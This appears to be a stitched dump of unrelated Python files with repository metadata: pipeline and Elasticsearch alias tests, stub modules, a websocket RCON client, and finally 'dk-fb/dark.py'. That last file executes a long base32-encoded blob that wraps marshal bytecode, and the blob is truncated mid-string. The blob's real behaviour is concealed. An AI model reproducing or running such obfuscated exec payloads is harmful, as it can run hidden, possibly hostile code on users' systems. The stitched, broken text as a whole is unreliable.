use_cached=False) # mock_executor_get.assert_called_once_with('mode_config') # def test_execute_prepares_a_new_run_id(monkeypatch, mocker): # mock_utils = mocker.MagicMock() # monkeypatch.setattr(pipeline, 'utils', mock_utils) # mock_utils.generate_run_id.return_value = 'new_run_id' # mock_prepare_configs = mocker.MagicMock() # monkeypatch.setattr(pipeline, 'prepare_configurations', mock_prepare_configs) # monkeypatch.setattr(pipeline, 'send_return_code', mocker.MagicMock()) # pipeline.execute(variables_file='var', pipeline_file='pipe', run_id=1) # _, kwargs = mock_prepare_configs.call_args # assert kwargs['run_id'] == 'new_run_id' # def test_execute_calls_graph_prepare_and_execute(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # monkeypatch.setattr(pipeline, 'utils', mock_utils) # mock_executor = mocker.MagicMock() # mock_prepare_graph_execution = mocker.MagicMock() # mock_execute_graph = mocker.MagicMock() # mock_executor.prepare_for_graph_execution = mock_prepare_graph_execution # mock_executor.execute_graph = mock_execute_graph # mock_prepare_configs = mocker.MagicMock(return_value=mock_executor) # monkeypatch.setattr(pipeline, 'prepare_configurations', mock_prepare_configs) # monkeypatch.setattr(pipeline, 'send_return_code', mocker.MagicMock()) # pipeline.execute(variables_file='var', pipeline_file='pipe', run_id=1) # mock_prepare_graph_execution.assert_called_once_with() # assert mock_execute_graph.call_count == 1

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1

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null

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7

69048e968a864f267a39e861035074936c780528

187

py

Python

robot/views.py

NicolasKiely/Robit-Tracker

048a559040d163725738b1ba891c00001ef3d1f7

[ "MIT" ]

null

robot/views.py

NicolasKiely/Robit-Tracker

048a559040d163725738b1ba891c00001ef3d1f7

[ "MIT" ]

null

robot/views.py

NicolasKiely/Robit-Tracker

048a559040d163725738b1ba891c00001ef3d1f7

[ "MIT" ]

null

from django.shortcuts import render def manage_new(request): ''' Webpage for editing new bot ''' pass def manage(request): ''' Webpage for editing existing bot ''' pass

18.7

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0.673797

24

187

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0

0.224599

187

9

45

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0.862069

0.326203

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0.4

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null

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1

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1

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1

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7

6906f12b3549ff8074072651ed17a54cc2f46ae6

152

py

Python

autolens/pipeline/phase/imaging/__init__.py

PyJedi/PyAutoLens

bcfb2e7b447aa24508fc648d60b6fd9b4fd852e7

[ "MIT" ]

1

2020-04-06T20:07:56.000Z

autolens/pipeline/phase/imaging/__init__.py

PyJedi/PyAutoLens

bcfb2e7b447aa24508fc648d60b6fd9b4fd852e7

[ "MIT" ]

null

autolens/pipeline/phase/imaging/__init__.py

PyJedi/PyAutoLens

bcfb2e7b447aa24508fc648d60b6fd9b4fd852e7

[ "MIT" ]

null

from .phase import PhaseImaging from autolens.pipeline.phase.imaging.result import Result from autolens.pipeline.phase.imaging.analysis import Analysis

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7

691d756658bb7d69bc4db44fb62ab77d0c9a0168

18,396

py

Python

tests/integration/test_alias.py

untergeek/curator_api

b53bf99b729488c0b2b05fd6b3d159113d0edc62

[ "Apache-2.0" ]

null

tests/integration/test_alias.py

untergeek/curator_api

b53bf99b729488c0b2b05fd6b3d159113d0edc62

[ "Apache-2.0" ]

null

tests/integration/test_alias.py

untergeek/curator_api

b53bf99b729488c0b2b05fd6b3d159113d0edc62

[ "Apache-2.0" ]

3

2018-12-11T04:42:25.000Z

2020-11-19T18:14:29.000Z

"""Test Alias Functionality""" # pylint: disable=C0111 import os import json import random import string import tempfile from datetime import datetime, timedelta import logging import elasticsearch from mock import patch, Mock import curator_api from . import CuratorTestCase from . import testvars as testvars HOST, PORT = os.environ.get('TEST_ES_SERVER', 'localhost:9200').split(':') PORT = int(PORT) if PORT else 9200 ALIAS = 'testalias' IDX1 = 'my_index' IDX2 = 'dummy' class TestActionAlias(CuratorTestCase): """Test Alias action behaviors""" def build_common(self): self.create_index(IDX1) self.create_index(IDX2) self.client.indices.put_alias(index=IDX1, name=ALIAS) self.action = curator_api.actions.Alias(self.client, ALIAS) def test_add_only(self): self.build_common() self.action.add([IDX2]) self.action.do_action() self.assertEqual(2, len(self.client.indices.get_alias(name=ALIAS))) def test_remove(self): self.build_common() self.client.indices.put_alias(index=IDX2, name=ALIAS) self.action.remove([IDX2]) self.action.do_action() self.assertEqual(1, len(self.client.indices.get_alias(name=ALIAS))) def test_skip_not_present(self): self.build_common() self.create_index('not_present') self.client.indices.put_alias(index=IDX2, name=ALIAS) self.action.remove([IDX2, 'not_present']) self.action.do_action() self.assertEqual(1, len(self.client.indices.get_alias(name=ALIAS))) def test_add_remove(self): self.build_common() expected = {'my_index': {'aliases': {'testalias': {}}}} self.assertEqual(expected, self.client.indices.get_alias(name=ALIAS)) self.action.add([IDX2]) self.action.remove([IDX1]) self.action.do_dry_run() self.action.do_action() expected = {'dummy': {'aliases': {'testalias': {}}}} self.assertEqual(expected, self.client.indices.get_alias(name=ALIAS)) # class TestActionFileAlias(CuratorTestCase): # def test_add_only(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_add_only.format(alias)) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEquals(2, len(self.client.indices.get_alias(name=alias))) # def test_add_only_with_extra_settings(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_add_only_with_extra_settings.format(alias)) # self.create_index('my_index') # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEquals( # { # 'my_index': { # 'aliases': { # 'testalias': { # 'filter': { # 'term': { # 'user': 'kimchy' # } # } # } # } # } # }, # self.client.indices.get_alias(name=alias) # ) # def test_alias_remove_only(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_remove_only.format(alias)) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {'dummy': {'aliases': {}}, 'my_index': {'aliases': {}}}, # self.client.indices.get_alias(index='dummy,my_index') # ) # def test_add_only_skip_closed(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_add_only.format(alias)) # self.create_index('my_index') # self.client.indices.close(index='my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # version = curator.get_version(self.client) # if version > (3,0,0): # self.assertEquals(2, len(self.client.indices.get_alias(name=alias))) # else: # self.assertEquals(1, len(self.client.indices.get_alias(name=alias))) # def test_add_and_remove(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_add_remove.format(alias)) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {u'my_index': {u'aliases': {alias: {}}}}, # self.client.indices.get_alias(name=alias) # ) # def test_add_and_remove_datemath(self): # alias = '<testalias-{now-1d/d}>' # alias_parsed = u'testalias-{0}'.format( # (datetime.utcnow()-timedelta(days=1)).strftime('%Y.%m.%d')) # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_add_remove.format(alias)) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy', name=alias_parsed) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {u'my_index': {u'aliases': {alias_parsed: {}}}}, # self.client.indices.get_alias(name=alias_parsed) # ) # def test_add_with_empty_remove(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_add_with_empty_remove.format(alias)) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {'dummy': {'aliases': {alias: {}}},'my_index': {'aliases': {alias: {}}}}, # self.client.indices.get_alias() # ) # def test_remove_with_empty_add(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_remove_with_empty_add.format(alias)) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy,my_index', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {'dummy': {'aliases': {}},'my_index': {'aliases': {alias: {}}}}, # self.client.indices.get_alias() # ) # def test_add_with_empty_list(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_add_remove_empty.format(alias, 'du', 'rickroll')) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {'dummy': {'aliases': {alias: {}}}, 'my_index': {'aliases': {}}}, # self.client.indices.get_alias() # ) # def test_remove_with_empty_list(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_add_remove_empty.format(alias, 'rickroll', 'my')) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='dummy', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {'dummy': {'aliases': {alias: {}}}, 'my_index': {'aliases': {}}}, # self.client.indices.get_alias() # ) # def test_remove_index_not_in_alias(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_remove_index_not_there.format(alias,'my')) # self.create_index('my_index1') # self.create_index('my_index2') # self.client.indices.put_alias(index='my_index1', name=alias) # test = clicktest.CliRunner() # result = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {'my_index1': {'aliases': {}}, 'my_index2': {'aliases': {}}}, # self.client.indices.get_alias() # ) # self.assertEqual(0, result.exit_code) # def test_no_add_remove(self): # alias = 'testalias' # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_no_add_remove.format(alias)) # self.create_index('my_index') # self.create_index('dummy') # test = clicktest.CliRunner() # result = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual(1, result.exit_code) # def test_no_alias(self): # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.alias_no_alias) # self.create_index('my_index') # self.create_index('dummy') # test = clicktest.CliRunner() # result = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual(-1, result.exit_code) # def test_extra_options(self): # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], # testvars.bad_option_proto_test.format('alias')) # test = clicktest.CliRunner() # result = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual(-1, result.exit_code) # def test_add_and_remove_sorted(self): # alias = 'testalias' # alias_add_remove = ( # '---\n' # 'actions:\n' # ' 1:\n' # ' description: "Add/remove specified indices from designated alias"\n' # ' action: alias\n' # ' options:\n' # ' name: {0}\n' # ' continue_if_exception: False\n' # ' disable_action: False\n' # ' add:\n' # ' filters:\n' # ' - filtertype: pattern\n' # ' kind: prefix\n' # ' value: dum\n' # ' remove:\n' # ' filters:\n' # ' - filtertype: pattern\n' # ' kind: prefix\n' # ' value: my\n' # ) # self.write_config( # self.args['configfile'], testvars.client_config.format(host, port)) # self.write_config(self.args['actionfile'], alias_add_remove.format(alias)) # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='my_index', name=alias) # test = clicktest.CliRunner() # _ = test.invoke( # curator.cli, # [ # '--config', self.args['configfile'], # self.args['actionfile'] # ], # ) # self.assertEqual( # {'dummy':{'aliases':{'testalias':{}}}}, # self.client.indices.get_alias(name=alias) # ) # class TestCLIAlias(CuratorTestCase): # def test_add_and_remove_alias(self): # alias = 'testalias' # self.create_index('my_index') # self.create_index('dummy') # self.client.indices.put_alias(index='my_index', name=alias) # args = self.get_runner_args() # args += [ # '--config', self.args['configfile'], # 'alias', # '--name', alias, # '--add', '{"filtertype":"pattern","kind":"prefix","value":"dum"}', # '--remove', '{"filtertype":"pattern","kind":"prefix","value":"my"}', # ] # self.assertEqual(0, self.run_subprocess(args, logname='TestCLIAlias.test_shrink')) # self.assertEqual( # {'dummy': {'aliases': {alias: {}}}}, # self.client.indices.get_alias(name=alias) # ) # def test_warn_if_no_indices(self): # alias = 'testalias' # self.create_index('dummy1') # self.create_index('dummy2') # self.client.indices.put_alias(index='dummy1', name=alias) # args = self.get_runner_args() # args += [ # '--config', self.args['configfile'], # 'alias', # '--name', alias, # '--add', '{"filtertype":"none"}', # '--remove', '{"filtertype":"pattern","kind":"prefix","value":"my"}', # '--warn_if_no_indices' # ] # self.assertEqual(0, self.run_subprocess( # args, logname='TestCLIAlias.test_warn_if_no_indices')) # self.assertEqual( # {'dummy1': {'aliases': {alias: {}}}, 'dummy2': {'aliases': {alias: {}}}}, # self.client.indices.get_alias(name=alias) # ) # def test_exit_1_on_empty_list(self): # alias = 'testalias' # self.create_index('dummy') # args = self.get_runner_args() # args += [ # '--config', self.args['configfile'], # 'alias', # '--name', alias, # '--add', '{"filtertype":"pattern","kind":"prefix","value":"dum","exclude":false}', # '--remove', '{"filtertype":"pattern","kind":"prefix","value":"my","exclude":false}', # ] # self.assertEqual(1, self.run_subprocess( # args, logname='TestCLIAlias.test_warn_if_no_indices'))

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696a34ccaa30b82bf92bd0af9cc23011a9390e4c

122

py

Python

tradeiobot/db/stores/__init__.py

hcv57/tradeio-bot

a4c9f96a104e20ca0618d8d787cfef3599c8ebb7

[ "MIT" ]

2

2018-10-28T18:47:02.000Z

2019-10-09T14:52:04.000Z

tradeiobot/db/stores/__init__.py

hcv57/tradeio-bot

a4c9f96a104e20ca0618d8d787cfef3599c8ebb7

[ "MIT" ]

null

tradeiobot/db/stores/__init__.py

hcv57/tradeio-bot

a4c9f96a104e20ca0618d8d787cfef3599c8ebb7

[ "MIT" ]

null

from tradeiobot.db.stores.sqlitestore import store as sqlite from tradeiobot.db.stores.memorystore import store as memory

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15db4f6b5257411c4e94089c9688f9d01a6d2105

77

py

Python

curses/use_module_to_share_curses_class/module2.py

sprapat/python-learn

79881988f79f3359dc4a5dc2902722adec7e5678

[ "MIT" ]

null

curses/use_module_to_share_curses_class/module2.py

sprapat/python-learn

79881988f79f3359dc4a5dc2902722adec7e5678

[ "MIT" ]

null

curses/use_module_to_share_curses_class/module2.py

sprapat/python-learn

79881988f79f3359dc4a5dc2902722adec7e5678

[ "MIT" ]

null

from display import display def print_display(): print(display)

15.4

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d699c31e0a3d40780a440553153fb2eb7a020b10

135

py

Python

rust_rcon/wsclient.py

samdixon/rust_rcon

18f76a9e85ddb39cddfb7f8eff388e357e09261c

[ "MIT" ]

2

2021-02-25T00:51:51.000Z

2021-09-03T08:57:44.000Z

rust_rcon/wsclient.py

samdixon/rust_rcon

18f76a9e85ddb39cddfb7f8eff388e357e09261c

[ "MIT" ]

3

2020-04-08T09:38:28.000Z

2022-03-26T15:56:51.000Z

rust_rcon/wsclient.py

samdixon/rust_rcon

18f76a9e85ddb39cddfb7f8eff388e357e09261c

[ "MIT" ]

1

2020-11-15T11:23:13.000Z

import websocket def websocket_connection(ip, port, password): return websocket.create_connection(f"ws://{ip}:{port}/{password}")

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d69b2c8fffdb4a54a3c2c9717e42dd29069c0cff

174,780

py

Python

dk-fb/dark.py

Alpha-Demon404/RE-14

b5b46a9f0eee218f2a642b615c77135c33c6f4ad

[ "MIT" ]

39

2020-02-26T09:44:36.000Z

2022-03-23T00:18:25.000Z

dk-fb/dark.py

B4BY-DG/reverse-enginnering

b5b46a9f0eee218f2a642b615c77135c33c6f4ad

[ "MIT" ]

15

2020-05-14T10:07:26.000Z

2022-01-06T02:55:32.000Z

dk-fb/dark.py

B4BY-DG/reverse-enginnering

b5b46a9f0eee218f2a642b615c77135c33c6f4ad

[ "MIT" ]

41

2020-03-16T22:36:38.000Z

2022-03-17T14:47:19.000Z

#Compile By Ariya Saputra #Github : https://github.com/Ariya-Coder import base64 exec(base64.b32decode('ENBW63LQNFWGKICCPEQEC4TJPFQSAU3BOB2XI4TBBIRUO2LUNB2WEIB2EBUHI5DQOM5C6L3HNF2GQ5LCFZRW63JPIFZGS6LBFVBW6ZDFOIFGS3LQN5ZHIIDNMFZHG2DBNQFGK6DFMMUG2YLSONUGC3BONRXWCZDTFATWGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXDYMQZFY6BZGNOHQMBQLR4DAMDDLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTHVOHQOJTLR4DAMC4PAYDAY24PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBTLR4DAMC4PAYDAXDYGAYEAXDYGAYFY6BQGBOHQMBQOMQVY6BQGBOHQMBQLR4DAMDELR4DAMC4PAYDAZC4PAYDCXDYGAYGYXDYGAYFY6BQGBNFY6BQGBOHQMBQMVOHQMBQLR4DAMDKLR4DAMK4PAYDAZC4PAYDEXDYGAYFY6BYGNOHQMBRLR4DAMDELR4DAMK4PAYDAXDYGA2FKZC4PAYDCXDYGAYFGKC4PAYDGXDYGAYFY6BQGBOHQMBQNFOHQZTGLR4GMZS4PBTGMXDYMZTE4424PBQTQXDYHEZFY6BQGBOHQMBQMNOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAZVY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGIK4PAYDAXDYGAYFY6BQGBSFY6BQGBOHQMBQMROHQMBRLR4DAMDMLR4DAMC4PAYDAWS4PAYDAXDYGAYGKXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBSLR4DAMC4PA4DGXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DANCVMROHQMBRLR4DAMCTFBOHQMBTLR4DAMC4PAYDAXDYGAYGSXDYMZTFY6DGMZOHQZTGLR4GMZSOONOHQMJTLR4DSMS4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHG7S4PA4TCXDYGAYFY6BQGBRVY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDGXDYGAYFY6BQGBOHQMBQIBOHQMBQLR4DAMC4PAYDA4ZBLR4DAMC4PAYDAXDYGAYGIXDYGAYFY6BQGBSFY6BQGFOHQMBQNROHQMBQLR4DAMC2LR4DAMC4PAYDAZK4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYGIXDYGAYVY6BQGBOHQMBUKVSFY6BQGFOHQMBQKMUFY6BQGNOHQMBQLR4DAMC4PAYDA2K4PBTGMXDYMZTFY6DGMZOHQZTGJZZVY6DFHFOHQOJQLR4DAMC4PAYDAY24PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBTLR4DAMC4PAYDAXDYGAYEAXDYGAYFY6BQGBOHQMBQOMQVY6BQGBOHQMBQLR4DAMDELR4DAMC4PAYDAZC4PAYDCXDYGAYGYXDYGAYFY6BQGBNFY6BQGBOHQMBQMVOHQMBQLR4DAMDKLR4DAMK4PAYDAZC4PAYDEXDYGAYFY6BYGNOHQMBRLR4DAMDELR4DAMK4PAYDAXDYGA2FKZC4PAYDCXDYGAYFGKC4PAYDGXDYGAYFY6BQGBOHQMBQNFOHQZTGLR4GMZS4PBTGMXDYMZTE442ULR4DSMC4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXDYMJTFY6BYMZOHQMBQLR4DAMDDLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTFJOHQODGLR4DAMC4PAYDAY24PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBTLR4DAMC4PAYDAXDYGAYEAXDYGAYFY6BQGBOHQMBQOMQVY6BQGBOHQMBQLR4DAMDELR4DAMC4PAYDAZC4PAYDCXDYGAYGYXDYGAYFY6BQGBNFY6BQGBOHQMBQMVOHQMBQLR4DAMDKLR4DAMK4PAYDAZC4PAYDEXDYGAYFY6BYGNOHQMBRLR4DAMDELR4DAMK4PAYDAXDYGA2FKZC4PAYDCXDYGAYFGKC4PAYDGXDYGAYFY6BQGBOHQMBQNFOHQZTGLR4GMZS4PBTGMXDYMZTE4424PA4TKXDYHBSVY6BQGBOHQMBQMNOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAZVY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGIK4PAYDAXDYGAYFY6BQGBSFY6BQGBOHQMBQMROHQMBRLR4DAMDMLR4DAMC4PAYDAWS4PAYDAXDYGAYGKXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBSLR4DAMC4PA4DGXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DANCVMROHQMBRLR4DAMCTFBOHQMBTLR4DAMC4PAYDAXDYGAYGSXDYMZTFY6DGMZOHQZTGLR4GMZSOONOHQMBQLR4DQZK4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHG224PA4GIXDYGAYFY6BQGBRVY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDGXDYGAYFY6BQGBOHQMBQIBOHQMBQLR4DAMC4PAYDA4ZBLR4DAMC4PAYDAXDYGAYGIXDYGAYFY6BQGBSFY6BQGFOHQMBQNROHQMBQLR4DAMC2LR4DAMC4PAYDAZK4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYGIXDYGAYVY6BQGBOHQMBUKVSFY6BQGFOHQMBQKMUFY6BQGNOHQMBQLR4DAMC4PAYDA2K4PBTGMXDYMZTFY6DGMZOHQZTGJZZVY6DEGZOHQODDLR4DAMC4PAYDAY24PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBTLR4DAMC4PAYDAXDYGAYEAXDYGAYFY6BQGBOHQMBQOMQVY6BQGBOHQMBQL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BOHQMBQLR4DAMC4PAYDAXDYGAZVY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGIK4PAYDAXDYGAYFY6BQGBSFY6BQGBOHQMBQMROHQMBRLR4DAMDMLR4DAMC4PAYDAWS4PAYDAXDYGAYGKXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBSLR4DAMC4PA4DGXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DANCVMROHQMBRLR4DAMCTFBOHQMBTLR4DAMC4PAYDAXDYGAYGSXDYMZTFY6DGMZOHQZTGLR4GMZSOONOHQYJZNNOHQMBQLR4DAMDDLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTLR4DCNDLLR4DAMC4PAYDAY24PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBTLR4DAMC4PAYDAXDYGAYEAXDYGAYFY6BQGBOHQMBQOMQVY6BQGBOHQMBQLR4DAMDELR4DAMC4PAYDAZC4PAYDCXDYGAYGYXDYGAYFY6BQGBNFY6BQGBOHQMBQMVOHQMBQLR4DAMDKLR4DAMK4PAYDAZC4PAYDEXDYGAYFY6BYGNOHQMBRLR4DAMDELR4DAMK4PAYDAXDYGA2FKZC4PAYDCXDYGAYFGKC4PAYDGXDYGAYFY6BQGBOHQMBQNFOHQZTGLR4GMZS4PBTGMXDYMZTE4424PA3WM2S4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXDYMVQ